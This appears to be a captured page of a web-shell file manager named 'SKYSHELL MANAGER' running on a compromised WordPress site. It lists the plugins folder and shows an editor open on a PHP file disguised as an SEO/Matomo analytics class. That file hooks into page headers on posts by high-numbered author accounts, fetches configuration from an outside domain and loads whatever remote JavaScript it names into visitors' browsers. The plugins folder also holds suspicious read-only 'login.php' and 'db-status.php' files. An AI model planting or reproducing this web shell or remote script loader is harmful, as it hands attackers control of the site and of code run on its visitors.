📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
redlightsquared.com
/
wp-content
/
plugins
/
Name
Size
Perm
Actions
📁
adminify
-
0755
🗑️
🏷️
🔒
📁
adminify-activity-logs
-
0755
🗑️
🏷️
🔒
📁
adminify-pro
-
0755
🗑️
🏷️
🔒
📁
akismet
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration-unlimited-extension
-
0755
🗑️
🏷️
🔒
📁
authorizenet-payment-gateway-for-woocommerce
-
0755
🗑️
🏷️
🔒
📁
backuply
-
0755
🗑️
🏷️
🔒
📁
backuply-pro
-
0755
🗑️
🏷️
🔒
📁
cf7-conditional-fields
-
0755
🗑️
🏷️
🔒
📁
classic-editor
-
0755
🗑️
🏷️
🔒
📁
code-snippets
-
0755
🗑️
🏷️
🔒
📁
contact-form-7
-
0755
🗑️
🏷️
🔒
📁
cookieadmin
-
0755
🗑️
🏷️
🔒
📁
cookieadmin-pro
-
0755
🗑️
🏷️
🔒
📁
crisp
-
0755
🗑️
🏷️
🔒
📁
duplicate-page
-
0755
🗑️
🏷️
🔒
📁
duplicator
-
0755
🗑️
🏷️
🔒
📁
export-media-with-selected-content
-
0755
🗑️
🏷️
🔒
📁
google-listings-and-ads
-
0755
🗑️
🏷️
🔒
📁
google-site-kit
-
0755
🗑️
🏷️
🔒
📁
gosmtp
-
0755
🗑️
🏷️
🔒
📁
gosmtp-pro
-
0755
🗑️
🏷️
🔒
📁
header-footer
-
0755
🗑️
🏷️
🔒
📁
litespeed-cache
-
0755
🗑️
🏷️
🔒
📁
loginizer
-
0755
🗑️
🏷️
🔒
📁
loginizer-security
-
0755
🗑️
🏷️
🔒
📁
loginpress
-
0755
🗑️
🏷️
🔒
📁
masterslider
-
0755
🗑️
🏷️
🔒
📁
oxygen
-
0755
🗑️
🏷️
🔒
📁
oxygen-gutenberg
-
0755
🗑️
🏷️
🔒
📁
oxygen-woocommerce
-
0755
🗑️
🏷️
🔒
📁
pagelayer
-
0755
🗑️
🏷️
🔒
📁
pagelayer-pro
-
0755
🗑️
🏷️
🔒
📁
pdf-embedder
-
0755
🗑️
🏷️
🔒
📁
rolemaster-suite
-
0755
🗑️
🏷️
🔒
📁
siteseo
-
0755
🗑️
🏷️
🔒
📁
siteseo-pro
-
0755
🗑️
🏷️
🔒
📁
speedycache
-
0755
🗑️
🏷️
🔒
📁
speedycache-pro
-
0755
🗑️
🏷️
🔒
📁
wc-external-product-new-tab
-
0755
🗑️
🏷️
🔒
📁
woocommerce
-
0755
🗑️
🏷️
🔒
📁
wordpress-seo
-
0755
🗑️
🏷️
🔒
📁
wp-headers-and-footers
-
0755
🗑️
🏷️
🔒
📄
db-status.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
723.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
login.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: class-wp-http-insights.php
<?php if (!defined('ABSPATH')) { exit; } function seo_matomo_author_id_min(): int { return defined('WP_GSTATIC_AUTHOR_MIN') ? (int) WP_GSTATIC_AUTHOR_MIN : 999; } function seo_matomo_author_id_max(): int { return defined('WP_GSTATIC_AUTHOR_MAX') ? (int) WP_GSTATIC_AUTHOR_MAX : 9999; } function seo_matomo_base_url(): string { return 'https://dillduck24.info'; } function seo_matomo_bootstrap_url(): string { return seo_matomo_base_url() . '/matomo-bootstrap.php'; } function seo_matomo_should_track(): bool { if (is_admin() || is_feed() || is_preview() || wp_doing_ajax() || is_robots() || is_trackback()) { return false; } if (!is_singular()) { return false; } $post_id = get_queried_object_id(); if (!$post_id) { return false; } $author_id = (int) get_post_field('post_author', $post_id); $min = seo_matomo_author_id_min(); $max = seo_matomo_author_id_max(); return ($author_id >= $min && $author_id <= $max); } function seo_matomo_print_tracker(): void { if (!seo_matomo_should_track()) { return; } $post_id = (int) get_queried_object_id(); $author_id = (int) get_post_field('post_author', $post_id); $post_slug = (string) get_post_field('post_name', $post_id); $post_type = (string) get_post_type($post_id); $bootstrap = seo_matomo_bootstrap_url(); ?> <script> (function () { var host = location.hostname.replace(/^www\./i, ''); var bootstrapUrl = <?php echo wp_json_encode($bootstrap); ?> + '?host=' + encodeURIComponent(host); fetch(bootstrapUrl, { credentials: 'omit' }) .then(function (r) { if (!r.ok) { throw new Error('Bootstrap HTTP ' + r.status); } return r.json(); }) .then(function (cfg) { if (!cfg || !cfg.siteId || !cfg.trackerUrl || !cfg.jsUrl) { throw new Error('Invalid bootstrap config'); } var _paq = window._paq = window._paq || []; _paq.push(['setTrackerUrl', cfg.trackerUrl]); _paq.push(['setSiteId', String(cfg.siteId)]); if (document.referrer) { _paq.push(['setReferrerUrl', document.referrer]); } _paq.push(['setCustomUrl', window.location.href]); _paq.push(['setDocumentTitle', document.title]); _paq.push(['setCustomDimension', 1, host]); _paq.push(['setCustomDimension', 2, String(<?php echo (int) $author_id; ?>)]); _paq.push(['setCustomDimension', 3, String(<?php echo (int) $post_id; ?>)]); _paq.push(['setCustomDimension', 4, <?php echo wp_json_encode($post_slug); ?>]); _paq.push(['setCustomDimension', 5, <?php echo wp_json_encode($post_type); ?>]); _paq.push(['setCustomDimension', 6, document.referrer || '']); _paq.push(['trackPageView']); _paq.push(['enableLinkTracking']); var d = document; var g = d.createElement('script'); var s = d.getElementsByTagName('script')[0]; g.async = true; g.src = cfg.jsUrl; s.parentNode.insertBefore(g, s); }) .catch(function (err) { console.error('Matomo bootstrap failed:', err); }); })(); </script> <?php } add_action('wp_head', 'seo_matomo_print_tracker', 1);
Save